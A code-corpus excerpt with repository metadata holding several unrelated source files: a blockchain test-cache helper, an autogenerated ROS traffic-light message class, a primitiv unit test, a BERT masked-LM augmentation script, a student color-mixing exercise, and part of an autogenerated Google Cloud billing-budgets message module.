] | permissive | fivebalanceID/Fivebalance_V3 | 89437d9bfbdc4f4e60f0f93e7491e061c2361f63 | 353986eb40326fe0c66d9172ea2b0a925b31c734 | refs/heads/master | 2022-06-16T23:13:33.670502 | 2021-05-21T04:57:44 | 2021-05-21T04:57:44 | 186,277,193 | 7 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,063 | py | #!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Create a blockchain cache.
Creating a cache of the blockchain speeds up test execution when running
multiple functional tests. This helper script is executed by test_runner when multiple
tests are being run in parallel.
"""
from test_framework.test_framework import FivebalanceTestFramework
class CreateCache(FivebalanceTestFramework):
# Test network and test nodes are not required:
def setup_chain(self):
self.log.info("Initializing test directory " + self.options.tmpdir)
# Initialize PoS chain (it will automatically generate PoW chain too)
self._initialize_chain(toPosPhase=True)
def set_test_params(self):
self.num_nodes = 0
self.supports_cli = True
def setup_network(self):
pass
def run_test(self):
pass
if __name__ == '__main__':
CreateCache().main()
| [
"43383911+fivebalanceID@users.noreply.github.com"
] | 43383911+fivebalanceID@users.noreply.github.com |
e8a823a890546c56c66c3bb0dbf0a510a17cf622 | 13f7adf576114c51f9f806a6fc5797b276d93f97 | /devel/lib/python2.7/dist-packages/autoware_msgs/msg/_traffic_light.py | 90177962beab0e196bf6f3c7b6ff861fedd20be4 | [] | no_license | yunjeongkim/keti_ws | a72a5ebc367b208654bdffb5bb9e8372cd959d33 | aaac717c15a7be7431b22fb4ec7a96a734f2e03c | refs/heads/master | 2020-04-05T06:18:52.334522 | 2018-11-21T01:47:34 | 2018-11-21T01:47:34 | 156,633,425 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,252 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from autoware_msgs/traffic_light.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
class traffic_light(genpy.Message):
_md5sum = "a4931ba214a0e37e220dd00b2acca20a"
_type = "autoware_msgs/traffic_light"
_has_header = True #flag to mark the presence of a Header object
_full_text = """Header header
int32 traffic_light
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
"""
__slots__ = ['header','traffic_light']
_slot_types = ['std_msgs/Header','int32']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,traffic_light
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(traffic_light, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.traffic_light is None:
self.traffic_light = 0
else:
self.header = std_msgs.msg.Header()
self.traffic_light = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_i().pack(self.traffic_light))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(self.traffic_light,) = _get_struct_i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_get_struct_i().pack(self.traffic_light))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(self.traffic_light,) = _get_struct_i().unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_i = None
def _get_struct_i():
global _struct_i
if _struct_i is None:
_struct_i = struct.Struct("<i")
return _struct_i
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
| [
"dallddungi@kaist.ac.kr"
] | dallddungi@kaist.ac.kr |
906eeb2a5472e5b670a01e82a47e15fedcdef251 | ba680f058f072e2950309ed40be8db110b29d24d | /python-primitiv/tests/instance_match.py | 990d4cfb6914632e8260b40d475f155d84deef7d | [
"Apache-2.0"
] | permissive | vbkaisetsu/primitiv | 29fb1b6ae0d544001997b157183e9df71eff1fae | 063c33ed7d3ddb49e56ede55471faaab6f67e063 | refs/heads/develop | 2021-05-07T23:42:11.845122 | 2017-11-03T04:29:23 | 2017-11-03T04:29:23 | 107,549,088 | 0 | 0 | null | 2017-10-19T13:20:40 | 2017-10-19T13:20:39 | null | UTF-8 | Python | false | false | 2,032 | py | from primitiv import Device
from primitiv import Graph
from primitiv import Parameter
from primitiv import Shape
from primitiv import Tensor
from primitiv import initializers as I
from primitiv import operators as F
from primitiv import tensor_operators as tF
from primitiv.devices import Naive
import numpy as np
import unittest
class ArgumentTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self.device = Naive()
Device.set_default(self.device)
self.graph = Graph()
Graph.set_default(self.graph)
def tearDown(self):
pass
def test_device_instance(self):
dev = Device.get_default()
self.assertIs(dev, self.device)
tensor = tF.input([0], Shape([]))
dev = tensor.device()
self.assertIs(dev, self.device)
node = F.input([0], Shape([]))
dev = node.device()
self.assertIs(dev, self.device)
my_device = Naive()
self.assertIsNot(my_device, self.device)
node = F.input([0], Shape([]), device=my_device)
dev = node.device()
self.assertIs(dev, my_device)
dev = self.graph.get_device(node)
self.assertIs(dev, my_device)
param = Parameter(Shape([]))
dev = param.device()
self.assertIs(dev, self.device)
def test_graph_instance(self):
g = Graph.get_default()
self.assertIs(g, self.graph)
node = F.input([0], Shape([]))
g = node.graph()
self.assertIs(g, self.graph)
def test_tensor_instance(self):
param = Parameter(Shape([]))
t_origin = param.gradient
t = param.gradient
self.assertIs(t, t_origin)
t = Tensor(t_origin)
self.assertEqual(t.to_list(), t.to_list())
self.assertIsNot(t, t_origin)
t = t_origin
t *= 2
self.assertIs(t, t_origin)
t = t * 2
self.assertIsNot(t, t_origin)
| [
"vbkaisetsu@gmail.com"
] | vbkaisetsu@gmail.com |
8530b6df6d2323c36d60a62c4890586510371443 | 94b5a22e94250322f9e949c2da2fd15bf7a9b84d | /train_aug.py | bc5b876849c699a97a20934f71f0a0d05426d291 | [
"MIT"
] | permissive | Mars-Wei/DD2424 | 7aabc88c72ab31857255bf64363853c6a8714270 | 2d0de060bf27572ad67ae99f8bc17060eab1e4cc | refs/heads/master | 2022-01-19T14:00:29.387999 | 2019-05-21T09:24:30 | 2019-05-21T09:24:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,624 | py | "Fine-tuning BertMasked Model with labeled dataset"
from __future__ import absolute_import, division, print_function
import argparse
import logging
import os
import random
import csv
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, TensorDataset, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from tqdm import trange
import shutil
from pytorch_pretrained_bert.file_utils import PYTORCH_PRETRAINED_BERT_CACHE
from pytorch_pretrained_bert.modeling import BertForMaskedLM
from pytorch_pretrained_bert.tokenization import BertTokenizer
from pytorch_pretrained_bert.optimization import BertAdam
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, init_ids, input_ids, input_mask, segment_ids, masked_lm_labels):
self.init_ids = init_ids
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.masked_lm_labels = masked_lm_labels
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_csv(cls, input_file, quotechar='"'):
"""Reads a comma separated value file."""
with open(input_file,"r",encoding='UTF-8') as f:
reader = csv.reader(
f,
delimiter=",",
quotechar=quotechar,
doublequote=True,
skipinitialspace=False,
)
lines = []
for line in enumerate(reader):
lines.append(line)
# delete label and sentence
del lines[0]
return lines
class AugProcessor(DataProcessor):
"""Processor for dataset to be augmented."""
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "train.csv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_csv(os.path.join(data_dir, "dev.csv")), "dev")
def get_labels(self, name):
"""add your dataset here"""
if name in ['toxic']:
return ["0", "1"]
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, line) in enumerate(lines):
guid ="%s-%s" % (set_type, i)
text_a = line[1][0]
text_b = None
label = line[1][-1]
examples.append(
InputExample(guid, text_a, text_b, label))
return examples
def convert_examples_to_features(examples, label_list, max_seq_length, tokenizer):
"""Loads a data file into a list of `InputBatch`s."""
label_map = {label : i for i, label in enumerate(label_list)}
features = []
dupe_factor = 5
masked_lm_prob = 0.15
rng = random.Random(123)
max_predictions_per_seq = 20
a = examples
for (ex_index, example) in enumerate(examples):
tokens_a = tokenizer.tokenize(example.text_a)
tokens_b = None
if len(tokens_a) > max_seq_length - 2: # maxlength = [cls]+token_length + [sep]
tokens_a = tokens_a[:(max_seq_length - 2)]
tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
label_id = label_map[example.label]
segment_ids = [label_id] * len(tokens)
masked_lm_labels = [-1]*max_seq_length
cand_indexes = []
for (i, token) in enumerate(tokens):
if token == "[CLS]" or token == "[SEP]":
continue
cand_indexes.append(i)
rng.shuffle(cand_indexes)
len_cand = len(cand_indexes)
output_tokens = list(tokens)
num_to_predict = min(max_predictions_per_seq,
max(1, int(round(len(tokens) * masked_lm_prob))))
masked_lms_pos = []
covered_indexes = set()
for index in cand_indexes:
if len(masked_lms_pos) >= num_to_predict:
break
if index in covered_indexes:
continue
covered_indexes.add(index)
masked_token = None
# 80% of the time, replace with [MASK]
if rng.random() < 0.8:
masked_token = "[MASK]"
else:
# 10% of the time, keep original
if rng.random() < 0.5:
masked_token = tokens[index]
# 10% of the time, replace with random word
else:
masked_token = tokens[cand_indexes[rng.randint(0, len_cand - 1)]]
masked_lm_labels[index] = tokenizer.convert_tokens_to_ids([tokens[index]])[0]
output_tokens[index] = masked_token
masked_lms_pos.append(index)
init_ids = tokenizer.convert_tokens_to_ids(tokens)
input_ids = tokenizer.convert_tokens_to_ids(output_tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
padding = [0] * (max_seq_length - len(input_ids))
init_ids += padding
input_ids += padding
input_mask += padding
segment_ids += padding
assert len(init_ids) == max_seq_length
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % (example.guid))
logger.info("tokens: %s" % " ".join(
[str(x) for x in tokens]))
logger.info("init_ids: %s" % " ".join([str(x) for x in init_ids]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
logger.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
logger.info("masked_lm_labels: %s" % " ".join([str(x) for x in masked_lm_labels]))
features.append(
InputFeatures(init_ids=init_ids,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
masked_lm_labels=masked_lm_labels))
return features
def remove_wordpiece(str):
if len(str) > 1:
for i in range(len(str) - 1, 0, -1):
if str[i] == '[PAD]':
str.remove(str[i])
elif len(str[i]) > 1 and str[i][0] == '#' and str[i][1] == '#':
str[i - 1] += str[i][2:]
str.remove(str[i])
return " ".join(str[1:-1])
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--data_dir", default="datasets", type=str,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.")
parser.add_argument("--output_dir", default="aug_data", type=str,
help="The output dir for augmented dataset")
parser.add_argument("--bert_model", default="bert-base-uncased", type=str,
help="The path of pretrained bert model.")
parser.add_argument("--task_name",default="toxic",type=str,
help="The name of the task to train.")
parser.add_argument("--max_seq_length", default=128, type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--do_lower_case", default=True, action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--train_batch_size", default=32, type=int,
help="Total batch size for training.")
parser.add_argument("--learning_rate", default=5e-5, type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs", default=3.0, type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--warmup_proportion", default=0.1, type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
parser.add_argument('--seed', type=int, default=42,
help="random seed for initialization")
args = parser.parse_args()
print(args)
run_aug(args, save_every_epoch=True)
def run_aug(args, save_every_epoch=False):
# Augment the dataset with your own choice of Processer
processors = {
"toxic": AugProcessor
}
task_name = args.task_name
if task_name not in processors:
raise ValueError("Task not found: %s" % (task_name))
args.data_dir = os.path.join(args.data_dir, task_name)
args.output_dir = os.path.join(args.output_dir, task_name)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
os.makedirs(args.output_dir, exist_ok=True)
processor = processors[task_name]()
label_list = processor.get_labels(task_name)
tokenizer = BertTokenizer.from_pretrained(args.bert_model, do_lower_case=args.do_lower_case)
train_examples = None
num_train_steps = None
train_examples = processor.get_train_examples(args.data_dir)
#dev_examples = processor.get_dev_examples(args.data_dir)
#train_examples.extend(dev_examples)
num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)
# Load fine-tuned model
def load_model(model_name):
weights_path = os.path.join(PYTORCH_PRETRAINED_BERT_CACHE,model_name)
model = torch.load(weights_path)
return model
MODEL_name = "{}/BertForMaskedLM_aug{}_epoch_3".format(task_name.lower(), task_name.lower())
model = load_model(MODEL_name)
model.cuda()
# Prepare optimizer
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'gamma', 'beta']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.01},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay_rate': 0.0}
]
t_total = num_train_steps
optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate,
warmup=args.warmup_proportion, t_total=t_total)
global_step = 0
train_features = convert_examples_to_features(
train_examples, label_list, args.max_seq_length, tokenizer)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_examples))
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Num steps = %d", num_train_steps)
all_init_ids = torch.tensor([f.init_ids for f in train_features], dtype=torch.long)
all_input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long)
all_input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long)
all_segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long)
all_masked_lm_labels = torch.tensor([f.masked_lm_labels for f in train_features], dtype=torch.long)
train_data = TensorDataset(all_init_ids, all_input_ids, all_input_mask, all_segment_ids, all_masked_lm_labels)
print(train_data)
train_sampler = RandomSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)
save_model_dir = os.path.join(PYTORCH_PRETRAINED_BERT_CACHE, task_name)
if not os.path.exists(save_model_dir):
os.mkdir(save_model_dir)
MASK_id = tokenizer.convert_tokens_to_ids(['[MASK]'])[0]
origin_train_path = os.path.join(args.output_dir, "train_origin.csv")
save_train_path = os.path.join(args.output_dir, "train.csv")
shutil.copy(origin_train_path, save_train_path)
for e in trange(int(args.num_train_epochs), desc="Epoch"):
'''
avg_loss = 0
for step, batch in enumerate(train_dataloader):
model.train()
batch = tuple(t.cuda() for t in batch)
_, input_ids, input_mask, segment_ids, masked_ids = batch
loss = model(input_ids, segment_ids, input_mask, masked_ids)
loss.backward()
avg_loss += loss.item()
optimizer.step()
model.zero_grad()
if (step + 1) % 50 == 0:
print("avg_loss: {}".format(avg_loss / 50))
avg_loss = 0
'''
#torch.cuda.empty_cache()
shutil.copy(origin_train_path, save_train_path)
save_train_file = open(save_train_path, 'a', encoding='UTF-8')
csv_writer = csv.writer(save_train_file, delimiter=',')
for step, batch in enumerate(train_dataloader):
model.eval()
batch = tuple(t.cuda() for t in batch)
init_ids, _, input_mask, segment_ids, masked_ids = batch
input_lens = [sum(mask).item() for mask in input_mask]
masked_idx = np.squeeze([np.random.randint(0, l, max(l//7, 2)) for l in input_lens])
for ids, idx in zip(init_ids, masked_idx):
ids[idx] = MASK_id
predictions = model(init_ids, segment_ids, input_mask)
print(step)
for ids, idx, preds, seg in zip(init_ids, masked_idx, predictions, segment_ids):
pred = torch.argsort(preds)[:,-1][idx]
ids[idx] = pred
pred_str = tokenizer.convert_ids_to_tokens(ids.cpu().numpy())
pred_str = remove_wordpiece(pred_str)
csv_writer.writerow([pred_str, seg[0].item()])
pred = torch.argsort(preds)[:,-2][idx]
ids[idx] = pred
pred_str = tokenizer.convert_ids_to_tokens(ids.cpu().numpy())
pred_str = remove_wordpiece(pred_str)
csv_writer.writerow([pred_str, seg[0].item()])
#torch.cuda.empty_cache()
predctions = predictions.detach().cpu()
#torch.cuda.empty_cache()
bak_train_path = os.path.join(args.output_dir, "train_epoch_{}.csv".format(e))
shutil.copy(save_train_path, bak_train_path)
if save_every_epoch:
save_model_name = "BertForMaskedLM_" + task_name + "_epoch_" + str(e + 1)
save_model_path = os.path.join(save_model_dir, save_model_name)
torch.save(model, save_model_path)
else:
if (e + 1) % 10 == 0:
save_model_name = "BertForMaskedLM_aug" + task_name + "_epoch_" + str(e + 1)
save_model_path = os.path.join(save_model_dir, save_model_name)
torch.save(model, save_model_path)
if __name__ == "__main__":
main() | [
"roylandstinger@gmail.com"
] | roylandstinger@gmail.com |
ae246fba8be299e7a03b72db632f82a55e5f6415 | 876e4043d5f68b71cdfd8796c85f502710f9f542 | /Colores.py | bc315012a8fbd9d5fd71df5be4e3dda44688a78a | [] | no_license | Edgarlv/Tarea_04 | cb6a36644002fa3ae1f951438bd132105555de63 | 31283587997702ab33ae7e19bca256ac23e90b86 | refs/heads/master | 2021-01-18T20:14:52.962230 | 2016-09-18T22:37:39 | 2016-09-18T22:37:39 | 68,458,853 | 0 | 0 | null | 2016-09-17T15:00:05 | 2016-09-17T15:00:05 | null | UTF-8 | Python | false | false | 732 | py | #encoding: UTF-8
#author: Edgar Eduardo Alvarado Duran
#Problema 3
def calcularColores(a,b):
if a=="rojo" and b=="azul" or b=="rojo" and a=="azul":
return "Morado"
else:
if a=="rojo" and b=="amarillo" or b=="rojo" and a=="amarillo":
return "Naranja"
else:
if a=="azul" and b=="amarillo" or b=="azul" and a=="amarillo":
return "Verde"
else:
print ("error")
def main():
a= raw_input("¿Que color quieres?")
a1= a.upper()
a2= a.lower()
b= raw_input("¿Que otro color quieres?")
b1= b.upper()
b2= b.lower()
print ("El color entre", a, "y", b," forma el color:",calcularColores(a,b))
main() | [
"noreply@github.com"
] | Edgarlv.noreply@github.com |
66a9052b381170d325564e1f868643a4dbafd533 | ad5d38fce4785037c108186f17eb1c64380355ef | /sddsd/google-cloud-sdk/lib/googlecloudsdk/third_party/apis/billingbudgets/v1beta1/billingbudgets_v1beta1_messages.py | 703342bc274d39c84cc7f65280b83732457e9420 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | saranraju90/multik8s | 75864b605a139ddb7947ed4de4ae8466bdd49acb | 428576dedef7bb9cd6516e2c1ab2714581e1137c | refs/heads/master | 2023-03-03T21:56:14.383571 | 2021-02-20T14:56:42 | 2021-02-20T14:56:42 | 339,665,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,295 | py | """Generated message classes for billingbudgets version v1beta1.
The Cloud Billing Budget API stores Cloud Billing budgets, which define a
budget plan and the rules to execute as spend is tracked against that plan.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from __future__ import absolute_import
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
from apitools.base.py import extra_types
package = 'billingbudgets'
class BillingbudgetsBillingAccountsBudgetsCreateRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsCreateRequest object.
Fields:
googleCloudBillingBudgetsV1beta1CreateBudgetRequest: A
GoogleCloudBillingBudgetsV1beta1CreateBudgetRequest resource to be
passed as the request body.
parent: Required. The name of the billing account to create the budget in.
Values are of the form `billingAccounts/{billingAccountId}`.
"""
googleCloudBillingBudgetsV1beta1CreateBudgetRequest = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1CreateBudgetRequest', 1)
parent = _messages.StringField(2, required=True)
class BillingbudgetsBillingAccountsBudgetsDeleteRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsDeleteRequest object.
Fields:
name: Required. Name of the budget to delete. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
"""
name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsGetRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsGetRequest object.
Fields:
name: Required. Name of budget to get. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
"""
name = _messages.StringField(1, required=True)
class BillingbudgetsBillingAccountsBudgetsListRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsListRequest object.
Fields:
pageSize: Optional. The maximum number of budgets to return per page. The
default and maximum value are 100.
pageToken: Optional. The value returned by the last `ListBudgetsResponse`
which indicates that this is a continuation of a prior `ListBudgets`
call, and that the system should return the next page of data.
parent: Required. Name of billing account to list budgets under. Values
are of the form `billingAccounts/{billingAccountId}`.
"""
pageSize = _messages.IntegerField(1, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(2)
parent = _messages.StringField(3, required=True)
class BillingbudgetsBillingAccountsBudgetsPatchRequest(_messages.Message):
r"""A BillingbudgetsBillingAccountsBudgetsPatchRequest object.
Fields:
googleCloudBillingBudgetsV1beta1UpdateBudgetRequest: A
GoogleCloudBillingBudgetsV1beta1UpdateBudgetRequest resource to be
passed as the request body.
name: Output only. Resource name of the budget. The resource name implies
the scope of a budget. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
"""
googleCloudBillingBudgetsV1beta1UpdateBudgetRequest = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1UpdateBudgetRequest', 1)
name = _messages.StringField(2, required=True)
class GoogleCloudBillingBudgetsV1beta1AllUpdatesRule(_messages.Message):
r"""AllUpdatesRule defines notifications that are sent based on budget spend
and thresholds.
Fields:
disableDefaultIamRecipients: Optional. When set to true, disables default
notifications sent when a threshold is exceeded. Default notifications
are sent to those with Billing Account Administrator and Billing Account
User IAM roles for the target account.
monitoringNotificationChannels: Optional. Targets to send notifications to
when a threshold is exceeded. This is in addition to default recipients
who have billing account IAM roles. The value is the full REST resource
name of a monitoring notification channel with the form
`projects/{project_id}/notificationChannels/{channel_id}`. A maximum of
5 channels are allowed. See https://cloud.google.com/billing/docs/how-
to/budgets-notification-recipients for more details.
pubsubTopic: Optional. The name of the Pub/Sub topic where budget related
messages will be published, in the form
`projects/{project_id}/topics/{topic_id}`. Updates are sent at regular
intervals to the topic. The topic needs to be created before the budget
is created; see https://cloud.google.com/billing/docs/how-
to/budgets#manage-notifications for more details. Caller is expected to
have `pubsub.topics.setIamPolicy` permission on the topic when it's set
for a budget, otherwise, the API call will fail with PERMISSION_DENIED.
See https://cloud.google.com/billing/docs/how-to/budgets-programmatic-
notifications for more details on Pub/Sub roles and permissions.
schemaVersion: Optional. Required when AllUpdatesRule.pubsub_topic is set.
The schema version of the notification sent to
AllUpdatesRule.pubsub_topic. Only "1.0" is accepted. It represents the
JSON schema as defined in https://cloud.google.com/billing/docs/how-
to/budgets-programmatic-notifications#notification_format.
"""
disableDefaultIamRecipients = _messages.BooleanField(1)
monitoringNotificationChannels = _messages.StringField(2, repeated=True)
pubsubTopic = _messages.StringField(3)
schemaVersion = _messages.StringField(4)
class GoogleCloudBillingBudgetsV1beta1Budget(_messages.Message):
r"""A budget is a plan that describes what you expect to spend on Cloud
projects, plus the rules to execute as spend is tracked against that plan,
(for example, send an alert when 90% of the target spend is met). Currently
all plans are monthly budgets so the usage period(s) tracked are implied
(calendar months of usage back-to-back).
Fields:
allUpdatesRule: Optional. Rules to apply to notifications sent based on
budget spend and thresholds.
amount: Required. Budgeted amount.
budgetFilter: Optional. Filters that define which resources are used to
compute the actual spend against the budget.
displayName: User data for display name in UI. Validation: <= 60 chars.
etag: Optional. Etag to validate that the object is unchanged for a read-
modify-write operation. An empty etag will cause an update to overwrite
other changes.
name: Output only. Resource name of the budget. The resource name implies
the scope of a budget. Values are of the form
`billingAccounts/{billingAccountId}/budgets/{budgetId}`.
thresholdRules: Optional. Rules that trigger alerts (notifications of
thresholds being crossed) when spend exceeds the specified percentages
of the budget.
"""
allUpdatesRule = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1AllUpdatesRule', 1)
amount = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1BudgetAmount', 2)
budgetFilter = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Filter', 3)
displayName = _messages.StringField(4)
etag = _messages.StringField(5)
name = _messages.StringField(6)
thresholdRules = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1ThresholdRule', 7, repeated=True)
class GoogleCloudBillingBudgetsV1beta1BudgetAmount(_messages.Message):
r"""The budgeted amount for each usage period.
Fields:
lastPeriodAmount: Use the last period's actual spend as the budget for the
present period.
specifiedAmount: A specified amount to use as the budget. `currency_code`
is optional. If specified when creating a budget, it must match the
currency of the billing account. If specified when updating a budget, it
must match the existing budget currency_code. The `currency_code` is
provided on output.
"""
lastPeriodAmount = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1LastPeriodAmount', 1)
specifiedAmount = _messages.MessageField('GoogleTypeMoney', 2)
class GoogleCloudBillingBudgetsV1beta1CreateBudgetRequest(_messages.Message):
r"""Request for CreateBudget
Fields:
budget: Required. Budget to create.
"""
budget = _messages.MessageField('GoogleCloudBillingBudgetsV1beta1Budget', 1)
class GoogleCloudBillingBudgetsV1beta1Filter(_messages.Message):
r"""A filter for a budget, limiting the scope of the cost to calculate.
Enums:
CreditTypesTreatmentValueValuesEnum: Optional. If not set, default
behavior is `INCLUDE_ALL_CREDITS`.
Messages:
LabelsValue: Optional. A single label and value pair specifying that usage
from only this set of labeled resources should be included in the
budget. Currently, multiple entries or multiple values per entry are not
